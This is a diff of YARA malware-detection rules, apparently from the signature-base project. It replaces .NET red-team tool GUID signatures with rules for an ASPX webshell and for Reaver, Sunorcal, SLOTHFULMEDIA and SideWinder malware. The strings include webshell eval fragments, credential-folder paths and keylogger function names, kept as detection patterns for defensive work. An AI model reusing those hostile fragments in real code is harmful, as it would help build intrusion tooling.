+		$s1 = ".Text + \" Created!\";" ascii
+		$s2 = "DriveInfo.GetDrives()" ascii
+		$s3 = "Encoding.UTF8.GetString(FromBase64String(str.Replace(" ascii
+		$s4 = "encodeURIComponent(btoa(String.fromCharCode.apply(null, new Uint8Array(bytes))));;"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x253c and filesize < 100KB and ( 1 of ( $x* ) or 2 of them ) or 4 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_P2P : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Chopper_Like_Mar21_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid (p2p Remote Desktop is dual use but 100% flagged as malicious on VT)"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e7b2b4bd-f1e1-5062-9b36-5df44ae374ea"
-		date = "2023-03-19"
-		modified = "2023-04-06"
-		reference = "https://github.com/miroslavpejic85/p2p"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5198-L5212"
+		description = "Detects Chopper like ASPX Webshells"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a4dc1880-865f-5e20-89a2-3a642c453ef9"
+		date = "2021-03-31"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L399-L416"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fcdeb2f481232ba0d13642b3003a94435c4de4e90c342c0db7707a6751a66834"
-		score = 75
+		logic_hash = "baa9eb1e3c4ac5ce49d27b1c3f75c8b6590567e25d98761a8b704478f2cee970"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ac44513e5ef93d8cbc17219350682c2246af6d5eb85c1b4302141d94c3b06c90"
 
 	strings:
-		$typelibguid0lo = "33456e72-f8e8-4384-88c4-700867df12e2" ascii wide
-		$typelibguid0up = "33456E72-F8E8-4384-88C4-700867DF12E2" ascii wide
+		$s1 = "http://f/<script language=\"JScript\" runat=\"server\">var _0x" ascii
+		$s2 = "));function Page_Load(){var _0x" ascii
+		$s3 = ";eval(Request[_0x" ascii
+		$s4 = "','orange','unsafe','" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 3KB and 1 of them or 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpwsus : FILE
+
+rule SIGNATURE_BASE_Reaver3_Malware_Nov17_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f020eea9-4ff4-5242-b9b2-53284505dab4"
-		date = "2023-03-22"
-		modified = "2023-04-06"
-		reference = "https://github.com/nettitude/SharpWSUS"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5214-L5228"
+		description = "Detects Reaver malware mentioned in PaloAltoNetworks report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "95419d6f-b657-53c4-840d-9a9e9b00787e"
+		date = "2017-11-11"
+		modified = "2023-12-05"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_reaver_sunorcal.yar#L14-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1511bb29b808146852555c7bc23cbdc9a4a2d70547fb1541790d1947a42d6089"
+		logic_hash = "fa141a1d3868bd4a004794bf51dc20086eb2e1446e1fa374834a6f2d84940c0d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1813f10bcf74beb582c824c64fff63cb150d178bef93af81d875ca84214307a1"
 
 	strings:
-		$typelibguid0lo = "42cabb74-1199-40f1-9354-6294bba8d3a4" ascii wide
-		$typelibguid0up = "42CABB74-1199-40F1-9354-6294BBA8D3A4" ascii wide
+		$s1 = "CPL.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imphash ( ) == "e722dd50a0e2bc0cab8ca35fc4bf6d99" and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpimpersonation : FILE
+
+rule SIGNATURE_BASE_Reaver3_Malware_Nov17_2 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5815c5bd-e3e8-5f2f-b03e-8a05fb4f6e91"
-		date = "2023-03-22"
-		modified = "2023-04-06"
-		reference = "https://github.com/S3cur3Th1sSh1t/SharpImpersonation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5230-L5244"
+		description = "Detects Reaver malware mentioned in PaloAltoNetworks report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "423ae050-5087-528e-be0a-c612024dc70a"
+		date = "2017-11-11"
+		modified = "2023-01-06"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_reaver_sunorcal.yar#L29-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c875b3e499b0fc6aa2833c3be88a4a4b93062e88cc8f1201eaf12e0b10f7cc95"
+		logic_hash = "f987876dae35d17fb3ac0d4d3cfe1e00f8977aa696194cc48e53ac1db9d55fca"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9213f70bce491991c4cbbbd7dc3e67d3a3d535b965d7064973b35c50f265e59b"
+		hash2 = "98eb5465c6330b9b49df2e7c9ad0b1164aa5b35423d9e80495a178eb510cdc1c"
 
 	strings:
-		$typelibguid0lo = "27a85262-8c87-4147-a908-46728ab7fc73" ascii wide
-		$typelibguid0up = "27A85262-8C87-4147-A908-46728AB7FC73" ascii wide
+		$x1 = "WindowsUpdateReaver" fullword wide
+		$s1 = "\\WUpdate.~tmp" ascii
+		$s2 = "\\~WUpdate.lnk" ascii
+		$s3 = "\\services\\" ascii
+		$s4 = "moomjufps" fullword ascii
+		$s5 = "gekmomkege" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "837cc5062a0758335b257ea3b27972b2" or 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcloud : FILE
+
+rule SIGNATURE_BASE_Reaver3_Malware_Nov17_3 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "048b0239-ea13-58ff-af35-fd505b4c977a"
-		date = "2023-03-22"
-		modified = "2023-04-06"
-		reference = "https://github.com/chrismaddalena/SharpCloud"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5246-L5260"
+		description = "Detects Reaver malware mentioned in PaloAltoNetworks report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cc2511a9-8938-5f4d-9802-f73e44609bf9"
+		date = "2017-11-11"
+		modified = "2023-01-06"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_reaver_sunorcal.yar#L55-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d1ad4088ce5b4216930d74ab7c2bc7b4d700928740faff27ebbb69e79068b14e"
+		logic_hash = "32654255102aee872402b0910422701f3cd4d0b2b8fc6e83440f325923ab9e2f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "18ac3b14300ecfeed4b64a844c16dccb06b0e3513d0954d6c6182f2ea14e4c92"
+		hash2 = "c0f8bb77284b96e07cab1c3fab8800b1bbd030720c74628c4ee5666694ef903d"
+		hash3 = "c906250e0a4c457663e37119ebe1efa1e4b97eef1d975f383ac3243f9f09908c"
+		hash4 = "1fcda755e8fa23d27329e4bc0443a82e1c1e9a6c1691639db256a187365e4db1"
+		hash5 = "d560f44188fb56d3abb11d9508e1167329470de19b811163eb1167534722e666"
 
 	strings:
-		$typelibguid0lo = "ca4e257e-69c1-45c5-9375-ba7874371892" ascii wide
-		$typelibguid0up = "CA4E257E-69C1-45C5-9375-BA7874371892" ascii wide
+		$s1 = "winhelp.dat" fullword ascii
+		$s2 = "\\microsoft\\Credentials\\" ascii
+		$s3 = "~Update.lnk" fullword ascii
+		$s4 = "winhelp.cpl" fullword ascii
+		$s5 = "\\services\\" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "8ee521b2316ddd6af1679eac9f5ed77b" or 4 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpssdp : FILE
+rule SIGNATURE_BASE_Sunorcal_Malware_Nov17_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8441e940-ab7c-5467-9db8-35f71bd57580"
-		date = "2023-03-22"
-		modified = "2023-04-06"
-		reference = "https://github.com/rvrsh3ll/SharpSSDP"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5262-L5276"
+		description = "Detects Reaver malware mentioned in PaloAltoNetworks report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d8a21570-d1d6-52c3-abb2-ecaa86eb7ff0"
+		date = "2017-11-11"
+		modified = "2023-12-05"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_reaver_sunorcal.yar#L82-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0bb30d6b35db2b8144d284f25051f231ce6684f6a1213dc24ba2da0d5e4d4603"
+		logic_hash = "88e6280c04b12b1d8530bafb44afc180685550f1f6bcefb731b3247f6a9529a2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "cb7c0cf1750baaa11783e93369230ee666b9f3da7298e4d1bb9a07af6a439f2f"
+		hash2 = "799139b5278dc2ac24279cc6c3db44f4ef0ea78ee7b721b0ace38fd8018c51ac"
+		hash3 = "38ea33dab0ba2edd16ecd98cba161c550d1036b253c8666c4110d198948329fb"
 
 	strings:
-		$typelibguid0lo = "6e383de4-de89-4247-a41a-79db1dc03aaa" ascii wide
-		$typelibguid0up = "6E383DE4-DE89-4247-A41A-79DB1DC03AAA" ascii wide
+		$x1 = "kQZ6l5t1kAlsjmBzsCZPrSpQn5tFrChLtTdsgTlOsClKt5pBsDdFrSVshnxMr6ZOpn9slndBsy1jq6lIr216rSNApn9P" fullword ascii
+		$x2 = { 00 00 00 00 00 00 00 00 00 00 00 00 21 21 21 73
+              79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 00 }
+		$x3 = "!!!url!!!" fullword ascii
+		$x4 = "h4NcbkdLrCpFpPQ=" fullword ascii
+		$x5 = "GloablCryptNv1" fullword ascii
+		$x6 = "Gloabl\\CryptNv1" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Wiretap : FILE
+rule SIGNATURE_BASE_APT_MAL_SLOTHFULMEDIA_Oct20_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5513a295-8907-5a9c-adca-760b33004229"
-		date = "2023-03-22"
-		modified = "2023-04-06"
-		reference = "https://github.com/djhohnstein/WireTap"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5278-L5292"
+		description = "Detects SLOTHFULMEDIA malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cc413225-f084-5859-bc27-04eb018d8894"
+		date = "2020-10-01"
+		modified = "2023-12-05"
+		reference = "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_iamtheking.yar#L2-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1e2199f7d4a01985edd2b4a071b928a3329e4f0f39d786608fdbbae1a01783fe"
+		logic_hash = "e50bda40eb05767e0903c3d8dd62b4e0290d89740c82c8b7f391d5763dc35156"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273"
+		hash2 = "927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae"
+		hash3 = "f0503f0131040b805e106eafe64a65d9404a0e279f052237b868e456c34d36e6"
+		hash4 = "ed5258306c06d6fac9b13c99c7c8accc7f7fa0de4cf4de4f7d9eccad916555f5"
+		hash5 = "04ca010f4c8997a023fabacae230698290e3ff918a86703c5e0a2a6983b039eb"
+		hash6 = "cb2adcaaa25bb6b8a9f1c685c219f8d6d78aa5cfd65c633f4d255ff81da2c517"
 
 	strings:
-		$typelibguid0lo = "b5067468-f656-450a-b29c-1c84cfe8dde5" ascii wide
-		$typelibguid0up = "B5067468-F656-450A-B29C-1C84CFE8DDE5" ascii wide
+		$xc1 = { 25 73 26 69 3D 25 64 00 48 54 54 50 2F 31 2E 31
+               00 00 00 00 50 4F 53 54 00 00 00 00 43 6F 6E 74
+               65 6E 74 2D 4C 65 6E 67 74 68 3A 20 25 64 00 00
+               5C 00 53 00 65 00 74 00 75 00 70 00 55 00 69 00
+               00 00 00 00 25 00 73 00 25 00 73 00 5F 00 25 00
+               64 00 2E 00 64 00 61 00 74 }
+		$xc2 = { 2F 76 3F 6D 3D 00 00 00 35 30 31 00 32 30 30 00
+               2A 00 2E 00 2A 00 00 00 25 00 73 00 00 00 00 00
+               53 00 65 00 44 00 65 00 62 00 75 00 67 00 50 00
+               72 00 69 00 76 00 69 00 6C 00 65 00 67 00 65 }
+		$xc3 = { 00 25 00 73 00 7C 00 25 00 73 00 7C 00 25 00 73
+               00 7C 00 25 00 73 00 00 00 5C 00 46 00 69 00 6C
+               00 74 00 65 00 72 00 33 00 2E 00 6A 00 70 00 67 }
+		$sc1 = { 25 74 65 6D 70 25 00 00 25 73 5C 25 73 2E 65 78
+               65 00 00 00 25 74 65 6D 70 25 00 00 25 73 5C 25
+               73 2E 65 78 65 }
+		$sc2 = { 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65
+               74 2D 73 74 72 65 61 6D 2C 61 70 70 6C 69 63 61
+               74 69 6F 6E 2F 78 68 74 6D 6C 00 00 25 73 26 69
+               3D 25 64 00 48 54 54 50 2F 31 2E 31 00 00 00 00
+               50 4F 53 54 }
+		$s1 = "%s%s_%d.dat" wide fullword
+		$s2 = "Local Security Process" wide fullword
+		$s3 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75" ascii fullword
+		$s4 = "Global%s%d" wide fullword
+		$s5 = "ExtKeyloggerStart" ascii fullword
+		$s6 = "GetExtendedTcpTable" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 3 of them ) or 4 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Kittylitter : FILE
+rule SIGNATURE_BASE_APT_Sidewinder_NET_Loader_Aug_2020_1_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f457b91f-4adb-5be6-b9c2-f6cc39d4bdaf"
-		date = "2023-03-22"
-		modified = "2023-04-06"
-		reference = "https://github.com/djhohnstein/KittyLitter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5294-L5312"
+		description = "Detected the NET loader used by SideWinder group (August 2020)"
+		author = "Arkbird_SOLG"
+		id = "61d96e2a-3a43-586f-85bc-a2c53b1318e6"
+		date = "2020-08-24"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/ShadowChasing1/status/1297902086747598852"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sidewinder.yar#L4-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0d68b2e8501db9e534b37260f7972caae8ec9756bf55c02ec60fadd256193080"
+		logic_hash = "5ee7029143c589f26e6c325e163bfac85507c950f09778bd51ec2bdf4d4263fa"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4a0947dd9148b3d5922651a6221afc510afcb0dfa69d08ee69429c4c75d4c8b4"
 
 	strings:
-		$typelibguid0lo = "449cf269-4798-4268-9a0d-9a17a08869ba" ascii wide
-		$typelibguid0up = "449CF269-4798-4268-9A0D-9A17A08869BA" ascii wide
-		$typelibguid1lo = "e7a509a4-2d44-4e10-95bf-b86cb7767c2c" ascii wide
-		$typelibguid1up = "E7A509A4-2D44-4E10-95BF-B86CB7767C2C" ascii wide
-		$typelibguid2lo = "b2b8dd4f-eba6-42a1-a53d-9a00fe785d66" ascii wide
-		$typelibguid2up = "B2B8DD4F-EBA6-42A1-A53D-9A00FE785D66" ascii wide
+		$a1 = "DUSER.dll" fullword wide
+		$s1 = "UHJvZ3JhbQ==" fullword wide
+		$s2 = "U3RhcnQ=" fullword wide
+		$s3 = ".tmp           " fullword wide
+		$s4 = "FileRipper" fullword ascii
+		$s5 = "copytight @" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 4KB and $a1 and 3 of ( $s* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpview : FILE
+rule SIGNATURE_BASE_APT_MAL_Sidewinder_Implant : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2ae1bc26-c137-55ce-ae2e-3204ff07f671"
-		date = "2023-03-22"
-		modified = "2023-04-06"
-		reference = "https://github.com/tevora-threat/SharpView"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5314-L5328"
+		description = "Detects SideWinder final payload"
+		author = "AT&T Alien Labs"
+		id = "3a420c9c-7821-5405-8d4d-6931d0f311ba"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://cybersecurity.att.com/blogs/labs-research/a-global-perspective-of-the-sidewinder-apt"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sidewinder.yar#L24-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "74c1b0ad4717b3d9494b0f1df4a51d03d0e0cbf99e5d911beaa2cc67cdd50233"
+		logic_hash = "bfad86dbdc04463e7e4cc126fd05fc9107617a7ea1bd3f283c0e0170862bd59b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c568238dcf1e30d55a398579a4704ddb8196b685"
 
 	strings:
-		$typelibguid0lo = "22a156ea-2623-45c7-8e50-e864d9fc44d3" ascii wide
-		$typelibguid0up = "22A156EA-2623-45C7-8E50-E864D9FC44D3" ascii wide
+		$code = { 1B 30 05 00 C7 00 00 00 00 00 00 00 02 28 03 00
+               00 06 7D 12 00 00 04 02 02 FE 06 23 00 00 06 73
+               5B 00 00 0A 14 20 88 13 00 00 15 73 5C 00 00 0A
+               7D 13 00 00 04 02 02 FE 06 24 00 00 06 73 5B 00
+               00 0A 14 20 88 13 00 00 15 73 5C 00 00 0A 7D 15
+               00 00 04 02 7B 12 00 00 04 6F 0E 00 00 06 2C 1D
+               02 28 1F 00 00 06 02 7B 12 00 00 04 16 6F 0F 00
+               00 06 02 7B 12 00 00 04 6F 06 00 00 06 02 7B 12
+               00 00 04 6F 10 00 00 06 2C 23 02 28 20 00 00 06
+               02 28 21 00 00 06 02 7B 12 00 00 04 16 }
+		$strings = {
+         2E 00 73 00 69 00 66 00 00 09 2E 00 66 00 6C 00
+         63 00 00 1B 73 00 65 00 6C 00 65 00 63 00 74 00
+         65 00 64 00 46 00 69 00 6C 00 65 00 73
+      }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Farmer : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Csharpsetthreadcontext : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
+		description = "Detects c# red/black-team tools via typelibguid"
 		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f69745b9-4ebd-547a-9af3-bc340b076e5d"
-		date = "2023-03-22"
+		id = "883bb859-d5ab-501d-8c83-0c5a2cf1f6c8"
+		date = "2020-12-13"
 		modified = "2023-04-06"
-		reference = "https://github.com/mdsecactivebreach/Farmer"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5330-L5350"
+		reference = "https://github.com/djhohnstein/CSharpSetThreadContext"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L6-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9f4c2cc503e8fd5b310f2c4b7d5914857612dab1435ca886bc7f8f362e822832"
+		logic_hash = "4e1d425c7921a4b80823275d0522ad74a94b12a3b137c54faa16a57ba5d60a89"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "37da2573-d9b5-4fc2-ae11-ccb6130cea9f" ascii wide
-		$typelibguid0up = "37DA2573-D9B5-4FC2-AE11-CCB6130CEA9F" ascii wide
-		$typelibguid1lo = "49acf861-1c10-49a1-bf26-139a3b3a9227" ascii wide
-		$typelibguid1up = "49ACF861-1C10-49A1-BF26-139A3B3A9227" ascii wide
-		$typelibguid2lo = "9a6c028f-423f-4c2c-8db3-b3499139b822" ascii wide
-		$typelibguid2up = "9A6C028F-423F-4C2C-8DB3-B3499139B822" ascii wide
-		$typelibguid3lo = "1c896837-e729-46a9-92b9-3bbe7ac2c90d" ascii wide
-		$typelibguid3up = "1C896837-E729-46A9-92B9-3BBE7AC2C90D" ascii wide
+		$typelibguid0lo = "a1e28c8c-b3bd-44de-85b9-8aa7c18a714d" ascii wide
+		$typelibguid0up = "A1E28C8C-B3BD-44DE-85B9-8AA7C18A714D" ascii wide
+		$typelibguid1lo = "87c5970e-0c77-4182-afe2-3fe96f785ebb" ascii wide
+		$typelibguid1up = "87C5970E-0C77-4182-AFE2-3FE96F785EBB" ascii wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Aesshellcodeinjector : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_DLL_Injection : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
+		description = "Detects c# red/black-team tools via typelibguid"
 		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "6253e30b-7c92-5237-a706-e93403a7c0b6"
-		date = "2023-03-22"
+		id = "aec4fc28-9aa2-5eef-9fb1-d187a83a72b3"
+		date = "2020-12-13"
 		modified = "2023-04-06"
-		reference = "https://github.com/san3ncrypt3d/AESShellCodeInjector"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5352-L5366"
+		reference = "https://github.com/ihack4falafel/DLL-Injection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L24-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a3a6793e5ba5788fb01b3a04dc287d0bad44c87c72da302e5629d59a35ee1583"
+		logic_hash = "e98c60d2aefb38c550a67003304196e04c42c8cb0317208cf8ffaca175ca4ba0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "b016da9e-12a1-4f1d-91a1-d681ae54e92c" ascii wide
-		$typelibguid0up = "B016DA9E-12A1-4F1D-91A1-D681AE54E92C" ascii wide
+		$typelibguid0lo = "3d7e1433-f81a-428a-934f-7cc7fcf1149d" ascii wide
+		$typelibguid0up = "3D7E1433-F81A-428A-934F-7CC7FCF1149D" ascii wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpchromium : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Limeusb_Csharp : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
+		description = "Detects c# red/black-team tools via typelibguid"
 		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5364956a-e199-556a-8055-0e7b9a7b14c8"
-		date = "2023-03-22"
+		id = "dfa96b36-e84c-510b-b16b-bd686777b83d"
+		date = "2020-12-13"
 		modified = "2023-04-06"
-		reference = "https://github.com/djhohnstein/SharpChromium"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5368-L5382"
+		reference = "https://github.com/NYAN-x-CAT/LimeUSB-Csharp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L40-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "00324bac8e8d9c335a359c2241e810d2e345ee6fb10a63b1bc05f33a7816c80d"
+		logic_hash = "10ba9197effc20894ff0812c7f1cf1a41c7b36ba89426696ca8961e10572d1d8"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "2133c634-4139-466e-8983-9a23ec99e01b" ascii wide
-		$typelibguid0up = "2133C634-4139-466E-8983-9A23EC99E01B" ascii wide
+		$typelibguid0lo = "94ea43ab-7878-4048-a64e-2b21b3b4366d" ascii wide
+		$typelibguid0up = "94EA43AB-7878-4048-A64E-2B21B3B4366D" ascii wide
 
 	condition:
